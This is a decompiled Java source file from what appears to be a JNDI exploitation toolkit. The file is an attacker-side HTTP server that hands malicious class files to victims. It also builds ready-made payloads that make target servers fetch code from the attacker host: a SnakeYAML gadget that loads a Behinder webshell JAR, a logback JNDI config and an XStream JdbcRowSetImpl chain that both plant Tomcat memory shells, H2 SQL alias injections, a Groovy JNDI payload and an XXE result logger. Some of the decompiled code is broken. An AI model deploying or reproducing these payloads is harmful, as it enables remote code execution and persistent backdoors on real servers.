package com.ar3h.chains.web.jndi;

import com.ar3h.chains.common.Constants;
import com.ar3h.chains.web.jndi.core.Cache;
import com.ar3h.chains.web.jndi.utils.Config;
import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.HttpHandler;
import com.sun.net.httpserver.HttpServer;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.net.InetSocketAddress;
import java.nio.charset.StandardCharsets;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.concurrent.Executor;
import java.util.concurrent.TimeUnit;
import net.jodah.expiringmap.ExpirationPolicy;
import net.jodah.expiringmap.ExpiringMap;
import org.apache.commons.lang3.reflect.FieldUtils;
import org.apache.velocity.servlet.VelocityServlet;
import org.eclipse.osgi.storage.Storage;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.beans.factory.BeanFactory;
import org.springframework.web.context.support.GroovyWebApplicationContext;
import org.springframework.web.context.support.XmlWebApplicationContext;

/* loaded from: input_file:BOOT-INF/classes/com/ar3h/chains/web/jndi/HTTPServer.class */
public class HTTPServer {
    private static final Logger log = LoggerFactory.getLogger((Class<?>) HTTPServer.class);
    public static String cwd = System.getProperty("user.dir");
    public static boolean running = false;
    private static HttpServer httpServer;

    public static void start() throws IOException {
        httpServer = HttpServer.create(new InetSocketAddress(Config.httpPort), 0);
        httpServer.createContext("/", new HttpHandler() { // from class: com.ar3h.chains.web.jndi.HTTPServer.1
            public void handle(HttpExchange httpExchange) {
                try {
                    String path = httpExchange.getRequestURI().getPath();
                    HTTPServer.log.info("New HTTP Request From " + httpExchange.getRemoteAddress() + "  " + httpExchange.getRequestURI());
                    List list = httpExchange.getRequestHeaders().get("user-agent");
                    if (list != null) {
                        HTTPServer.log.info("Client User-Agent {}", list);
                    }
                    if (path.endsWith(".class")) {
                        HTTPServer.handleClassRequest(httpExchange);
                    } else {
                        HTTPServer.handleSecureFileRequest(httpExchange);
                    }
                } catch (Exception e) {
                    e.printStackTrace();
                }
            }
        });
        httpServer.setExecutor((Executor) null);
        httpServer.start();
        log.info("[HTTP Server] Listening on {}:{}", Config.listenIp, Integer.valueOf(Config.httpPort));
        running = true;
    }

    public static void stop() {
        if (httpServer != null) {
            httpServer.stop(0);
            log.info("[HTTP Server] has been stopped.");
            Cache.httpDataMap = ExpiringMap.builder().maxSize(10000).expiration(168L, TimeUnit.HOURS).variableExpiration().expirationPolicy(ExpirationPolicy.CREATED).build();
            log.debug("clean httpDataMap successfully");
            running = false;
        }
    }

    private static void handleFileRequest(HttpExchange httpExchange) throws Exception {
        String path = httpExchange.getRequestURI().getPath();
        File file = new File(cwd + File.separator + Storage.BUNDLE_DATA_DIR + File.separator + path.substring(path.lastIndexOf("/") + 1));
        if (file.exists() && file.isFile()) {
            byte[] bArr = new byte[(int) file.length()];
            new FileInputStream(file).read(bArr);
            httpExchange.sendResponseHeaders(200, file.length() + 1);
            httpExchange.getResponseBody().write(bArr);
        } else {
            log.warn("Response Code: 404");
            httpExchange.sendResponseHeaders(404, 0L);
        }
        httpExchange.close();
    }

    /* JADX INFO: Access modifiers changed from: private */
    public static void handleSecureFileRequest(HttpExchange httpExchange) throws Exception {
        String[] split = httpExchange.getRequestURI().getPath().split("/");
        String str = split[split.length - 1];
        log.info("Request filename: " + str);
        File file = new File(cwd + File.separator + "data/http" + File.separator + str);
        byte[] bArr = null;
        if (file.exists() && file.isFile()) {
            new FileInputStream(file).read(new byte[(int) file.length()]);
        } else {
            bArr = Cache.get(str);
        }
        if (bArr != null) {
            httpExchange.sendResponseHeaders(200, file.length());
            httpExchange.getResponseBody().write(bArr);
            log.info("Response Code: 200");
            log.info("Response file length: " + bArr.length);
        } else {
            log.warn("Response Code: 404");
            httpExchange.sendResponseHeaders(404, 0L);
        }
        httpExchange.close();
    }

    private static void handleYmlRequest(HttpExchange httpExchange) throws IOException {
        String path = httpExchange.getRequestURI().getPath();
        String substring = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
        String str = "!!javax.script.ScriptEngineManager [\n  !!java.net.URLClassLoader [[\n    !!java.net.URL [\"http://" + Config.ip + ":" + Config.httpPort + "/behinder3.jar\"]\n  ]]\n]\n";
        if (substring.equalsIgnoreCase("snake")) {
            log.info("Response Code: 200");
            httpExchange.sendResponseHeaders(200, str.getBytes().length + 1);
            httpExchange.getResponseBody().write(str.getBytes(StandardCharsets.UTF_8));
        } else {
            File file = new File((cwd + File.separator + Storage.BUNDLE_DATA_DIR) + File.separator + substring + ".yml");
            if (file.exists()) {
                byte[] bArr = new byte[(int) file.length()];
                FileInputStream fileInputStream = new FileInputStream(file);
                Throwable th = null;
                try {
                    try {
                        fileInputStream.read(bArr);
                        if (fileInputStream != null) {
                            if (0 != 0) {
                                try {
                                    fileInputStream.close();
                                } catch (Throwable th2) {
                                    th.addSuppressed(th2);
                                }
                            } else {
                                fileInputStream.close();
                            }
                        }
                        httpExchange.getResponseHeaders().set("Content-type", "application/octet-stream");
                        httpExchange.sendResponseHeaders(200, file.length() + 1);
                        httpExchange.getResponseBody().write(bArr);
                    } finally {
                    }
                } catch (Throwable th3) {
                    if (fileInputStream != null) {
                        if (th != null) {
                            try {
                                fileInputStream.close();
                            } catch (Throwable th4) {
                                th.addSuppressed(th4);
                            }
                        } else {
                            fileInputStream.close();
                        }
                    }
                    throw th3;
                }
            } else {
                log.warn("Response Code: 404");
                httpExchange.sendResponseHeaders(404, 0L);
            }
        }
        httpExchange.close();
    }

    public static void handleTXTRequest(HttpExchange httpExchange) throws IOException {
        String path = httpExchange.getRequestURI().getPath();
        String substring = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
        if (substring.equalsIgnoreCase("isok")) {
            log.info("Response Code: 200");
            byte[] bytes = "success!".getBytes();
            httpExchange.getResponseHeaders().set("Content-type", "application/octet-stream");
            httpExchange.sendResponseHeaders(200, bytes.length + 1);
            httpExchange.getResponseBody().write(bytes);
        } else {
            File file = new File((cwd + File.separator + Storage.BUNDLE_DATA_DIR) + File.separator + substring + ".txt");
            if (file.exists()) {
                byte[] bArr = new byte[(int) file.length()];
                FileInputStream fileInputStream = new FileInputStream(file);
                Throwable th = null;
                try {
                    try {
                        fileInputStream.read(bArr);
                        if (fileInputStream != null) {
                            if (0 != 0) {
                                try {
                                    fileInputStream.close();
                                } catch (Throwable th2) {
                                    th.addSuppressed(th2);
                                }
                            } else {
                                fileInputStream.close();
                            }
                        }
                        httpExchange.getResponseHeaders().set("Content-type", "application/octet-stream");
                        httpExchange.sendResponseHeaders(200, file.length() + 1);
                        httpExchange.getResponseBody().write(bArr);
                    } finally {
                    }
                } catch (Throwable th3) {
                    if (fileInputStream != null) {
                        if (th != null) {
                            try {
                                fileInputStream.close();
                            } catch (Throwable th4) {
                                th.addSuppressed(th4);
                            }
                        } else {
                            fileInputStream.close();
                        }
                    }
                    throw th3;
                }
            } else {
                log.warn("Response Code: 404");
                httpExchange.sendResponseHeaders(404, 0L);
            }
        }
        httpExchange.close();
    }

    public static void handleXMLRequest(HttpExchange httpExchange) throws IOException {
        String path = httpExchange.getRequestURI().getPath();
        String substring = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
        String str = "<configuration>\n  <insertFromJNDI env-entry-name=\"ldap://" + Config.ip + ":" + Config.ldapPort + "/TomcatBypass/TomcatMemshell3\" as=\"appName\" />\n</configuration>";
        String str2 = "<linked-hash-set>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n        <dataHandler>\n          <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n            <is class=\"javax.crypto.CipherInputStream\">\n              <cipher class=\"javax.crypto.NullCipher\">\n                <initialized>false</initialized>\n                <opmode>0</opmode>\n                <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n                  <iter class=\"javax.imageio.spi.FilterIterator\">\n                    <iter class=\"java.util.Collections$EmptyIterator\"/>\n                    <next class=\"com.sun.rowset.JdbcRowSetImpl\" serialization=\"custom\">\n                      <javax.sql.rowset.BaseRowSet>\n                        <default>\n                          <concurrency>1008</concurrency>\n                          <escapeProcessing>true</escapeProcessing>\n                          <fetchDir>1000</fetchDir>\n                          <fetchSize>0</fetchSize>\n                          <isolation>2</isolation>\n                          <maxFieldSize>0</maxFieldSize>\n                          <maxRows>0</maxRows>\n                          <queryTimeout>0</queryTimeout>\n                          <readOnly>true</readOnly>\n                          <rowSetType>1004</rowSetType>\n                          <showDeleted>false</showDeleted>\n                          <dataSource>ldap://" + Config.ip + ":1389/basic/TomcatMemShell3</dataSource>\n                          <listeners/>\n                          <params/>\n                        </default>\n                      </javax.sql.rowset.BaseRowSet>\n                      <com.sun.rowset.JdbcRowSetImpl>\n                        <default>\n                          <iMatchColumns>\n                            <int>-1</int>\n                            <int>-1</int>\n                            <int>-1</int>\n                            <int>-1</int>\n                            <int>-1</int>\n                            <int>-1</int>\n                            <int>-1</int>\n                            <int>-1</int>\n                            <int>-1</int>\n                            <int>-1</int>\n                          </iMatchColumns>\n                          <strMatchColumns>\n                            <null/>\n                            <null/>\n                            <null/>\n                            <null/>\n                            <null/>\n                            <null/>\n                            <null/>\n                            <null/>\n                            <null/>\n                            <null/>\n                          </strMatchColumns>\n                        </default>\n                      </com.sun.rowset.JdbcRowSetImpl>\n                    </next>\n                  </iter>\n                  <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n                    <method>\n                      <class>com.sun.rowset.JdbcRowSetImpl</class>\n                      <name>getDatabaseMetaData</name>\n                      <parameter-types/>\n                    </method>\n                    <name>foo</name>\n                  </filter>\n                  <next class=\"string\">foo</next>\n                </serviceIterator>\n                <lock/>\n              </cipher>\n              <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n              <ibuffer></ibuffer>\n              <done>false</done>\n              <ostart>0</ostart>\n              <ofinish>0</ofinish>\n              <closed>false</closed>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n</linked-hash-set>";
        if (substring.equals("a")) {
            log.info("Response Code: 200");
            httpExchange.sendResponseHeaders(200, str.getBytes().length + 1);
            httpExchange.getResponseBody().write(str.getBytes(StandardCharsets.UTF_8));
        } else if (substring.equals("x")) {
            log.info("Response Code: 200");
            httpExchange.getResponseHeaders().add("Content-Type", "application/xml; charset=utf-8");
            httpExchange.sendResponseHeaders(200, str2.getBytes().length + 1);
            httpExchange.getResponseBody().write(str2.getBytes(StandardCharsets.UTF_8));
        } else {
            File file = new File((cwd + File.separator + Storage.BUNDLE_DATA_DIR) + File.separator + substring + XmlWebApplicationContext.DEFAULT_CONFIG_LOCATION_SUFFIX);
            if (file.exists()) {
                byte[] bArr = new byte[(int) file.length()];
                FileInputStream fileInputStream = new FileInputStream(file);
                Throwable th = null;
                try {
                    try {
                        fileInputStream.read(bArr);
                        if (fileInputStream != null) {
                            if (0 != 0) {
                                try {
                                    fileInputStream.close();
                                } catch (Throwable th2) {
                                    th.addSuppressed(th2);
                                }
                            } else {
                                fileInputStream.close();
                            }
                        }
                        httpExchange.getResponseHeaders().add("Content-Type", "application/xml; charset=utf-8");
                        httpExchange.sendResponseHeaders(200, file.length() + 1);
                        httpExchange.getResponseBody().write(bArr);
                    } finally {
                    }
                } catch (Throwable th3) {
                    if (fileInputStream != null) {
                        if (th != null) {
                            try {
                                fileInputStream.close();
                            } catch (Throwable th4) {
                                th.addSuppressed(th4);
                            }
                        } else {
                            fileInputStream.close();
                        }
                    }
                    throw th3;
                }
            } else {
                System.out.println("[!] Response Code: 404");
                httpExchange.sendResponseHeaders(404, 0L);
            }
        }
        httpExchange.close();
    }

    public static void handleSQLRequest(HttpExchange httpExchange) throws IOException {
        String path = httpExchange.getRequestURI().getPath();
        String host = httpExchange.getRequestURI().getHost();
        String substring = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
        if (substring.equalsIgnoreCase("echo")) {
            log.info("Response Code: 200");
            String valueOf = String.valueOf(System.nanoTime());
            httpExchange.sendResponseHeaders(200, r0.getBytes().length + 1);
            httpExchange.getResponseBody().write(("CREATE ALIAS " + valueOf + " AS CONCAT('void ex()throws Exception{Object o = com.sun.rowset.JdbcRowSetImpl();',' o.setDataSourceName(\"ldap://" + host + ":1389/TomcatBypass/TomcatEcho\");',' 'o.setAutoCommit(\"true\");,'}');CALL " + valueOf + "();\"}").getBytes(StandardCharsets.UTF_8));
        } else if (substring.equalsIgnoreCase("inject")) {
            log.info("Response Code: 200");
            String valueOf2 = String.valueOf(System.nanoTime());
            httpExchange.sendResponseHeaders(200, r0.getBytes().length + 1);
            httpExchange.getResponseBody().write(("CREATE ALIAS " + valueOf2 + " AS CONCAT('void ex()throws Exception{Object o = com.sun.rowset.JdbcRowSetImpl();',' o.setDataSourceName(\"ldap:// + host + :1389/inject.class\");',' 'o.setAutoCommit(\"true\");,'}');CALL " + valueOf2 + "();\"}").getBytes(StandardCharsets.UTF_8));
        } else {
            File file = new File((cwd + File.separator + Storage.BUNDLE_DATA_DIR) + File.separator + substring + ".sql");
            if (file.exists()) {
                byte[] bArr = new byte[(int) file.length()];
                FileInputStream fileInputStream = new FileInputStream(file);
                Throwable th = null;
                try {
                    try {
                        fileInputStream.read(bArr);
                        if (fileInputStream != null) {
                            if (0 != 0) {
                                try {
                                    fileInputStream.close();
                                } catch (Throwable th2) {
                                    th.addSuppressed(th2);
                                }
                            } else {
                                fileInputStream.close();
                            }
                        }
                        httpExchange.sendResponseHeaders(200, file.length() + 1);
                        httpExchange.getResponseBody().write(bArr);
                    } finally {
                    }
                } catch (Throwable th3) {
                    if (fileInputStream != null) {
                        if (th != null) {
                            try {
                                fileInputStream.close();
                            } catch (Throwable th4) {
                                th.addSuppressed(th4);
                            }
                        } else {
                            fileInputStream.close();
                        }
                    }
                    throw th3;
                }
            } else {
                System.out.println("[!] Response Code: 404");
                httpExchange.sendResponseHeaders(404, 0L);
            }
        }
        httpExchange.close();
    }

    public static void handlerGroovyRequest(HttpExchange httpExchange) throws IOException {
        String path = httpExchange.getRequestURI().getPath();
        String host = httpExchange.getRequestURI().getHost();
        String substring = path.substring(path.lastIndexOf("/") + 1, path.lastIndexOf("."));
        if (substring.equalsIgnoreCase("groovyecho")) {
            log.info("Response Code: 200");
            httpExchange.sendResponseHeaders(200, r0.getBytes().length + 1);
            httpExchange.getResponseBody().write(("class demo {\n    static void main(){\n        com.sun.rowset.JdbcRowSetImpl o = new com.sun.rowset.JdbcRowSetImpl();\n        o.setDataSourceName(\"ldap://" + host + ":1389/TomcatBypass/TomcatEcho\");\n        o.setAutoCommit(true);\n    }\n}\n").getBytes(StandardCharsets.UTF_8));
        } else {
            File file = new File((cwd + File.separator + Storage.BUNDLE_DATA_DIR) + File.separator + substring + GroovyWebApplicationContext.DEFAULT_CONFIG_LOCATION_SUFFIX);
            if (file.exists()) {
                byte[] bArr = new byte[(int) file.length()];
                FileInputStream fileInputStream = new FileInputStream(file);
                Throwable th = null;
                try {
                    try {
                        fileInputStream.read(bArr);
                        if (fileInputStream != null) {
                            if (0 != 0) {
                                try {
                                    fileInputStream.close();
                                } catch (Throwable th2) {
                                    th.addSuppressed(th2);
                                }
                            } else {
                                fileInputStream.close();
                            }
                        }
                        httpExchange.sendResponseHeaders(200, file.length() + 1);
                        httpExchange.getResponseBody().write(bArr);
                    } finally {
                    }
                } catch (Throwable th3) {
                    if (fileInputStream != null) {
                        if (th != null) {
                            try {
                                fileInputStream.close();
                            } catch (Throwable th4) {
                                th.addSuppressed(th4);
                            }
                        } else {
                            fileInputStream.close();
                        }
                    }
                    throw th3;
                }
            } else {
                System.out.println("[!] Response Code: 404");
                httpExchange.sendResponseHeaders(404, 0L);
            }
        }
        httpExchange.close();
    }

    public static void handleXXELogRequest(HttpExchange httpExchange) throws IllegalAccessException, IOException {
        log.info("XXE Attack Result: " + ((String) FieldUtils.readField(FieldUtils.readField(FieldUtils.readField((Object) httpExchange, "impl", true), VelocityServlet.REQUEST, true), "startLine", true)));
        httpExchange.sendResponseHeaders(200, 0L);
        httpExchange.close();
    }

    private static void handle404(HttpExchange httpExchange) throws IOException {
        log.warn("Response Code: 404");
        httpExchange.sendResponseHeaders(404, 0L);
    }

    /* JADX INFO: Access modifiers changed from: private */
    public static void handleClassRequest(HttpExchange httpExchange) throws IOException {
        String path = httpExchange.getRequestURI().getPath();
        log.info("Request ClassRequest Path: " + path);
        String replace = path.substring(path.indexOf("/") + 1, path.lastIndexOf(".")).replace("/", ".");
        if (Cache.contains(replace)) {
            log.info("Response Code: 200");
            byte[] bArr = Cache.get(replace);
            if (!Constants.DEBUG.booleanValue()) {
                Cache.remove(replace);
            }
            httpExchange.sendResponseHeaders(200, bArr.length);
            httpExchange.getResponseBody().write(bArr);
            log.info("Response Length: " + bArr.length + " bytes");
            log.info("----- Basic Exploit End -----\n");
        } else {
            File file = new File((cwd + File.separator + Storage.BUNDLE_DATA_DIR) + File.separator + replace + ".class");
            if (file.exists()) {
                byte[] bArr2 = new byte[(int) file.length()];
                FileInputStream fileInputStream = new FileInputStream(file);
                Throwable th = null;
                try {
                    try {
                        fileInputStream.read(bArr2);
                        if (fileInputStream != null) {
                            if (0 != 0) {
                                try {
                                    fileInputStream.close();
                                } catch (Throwable th2) {
                                    th.addSuppressed(th2);
                                }
                            } else {
                                fileInputStream.close();
                            }
                        }
                        httpExchange.getResponseHeaders().set("Content-type", "application/octet-stream");
                        httpExchange.sendResponseHeaders(200, file.length() + 1);
                        httpExchange.getResponseBody().write(bArr2);
                    } finally {
                    }
                } catch (Throwable th3) {
                    if (fileInputStream != null) {
                        if (th != null) {
                            try {
                                fileInputStream.close();
                            } catch (Throwable th4) {
                                th.addSuppressed(th4);
                            }
                        } else {
                            fileInputStream.close();
                        }
                    }
                    throw th3;
                }
            } else {
                log.warn("Response Code: 404");
                httpExchange.sendResponseHeaders(404, 0L);
            }
        }
        httpExchange.close();
    }

    private static Map<String, String> parseQuery(String str) {
        HashMap hashMap = new HashMap();
        try {
            for (String str2 : str.split(BeanFactory.FACTORY_BEAN_PREFIX)) {
                try {
                    String[] split = str2.split("=", 2);
                    hashMap.put(split[0], split[1]);
                } catch (Exception e) {
                }
            }
        } catch (Exception e2) {
        }
        return hashMap;
    }
}
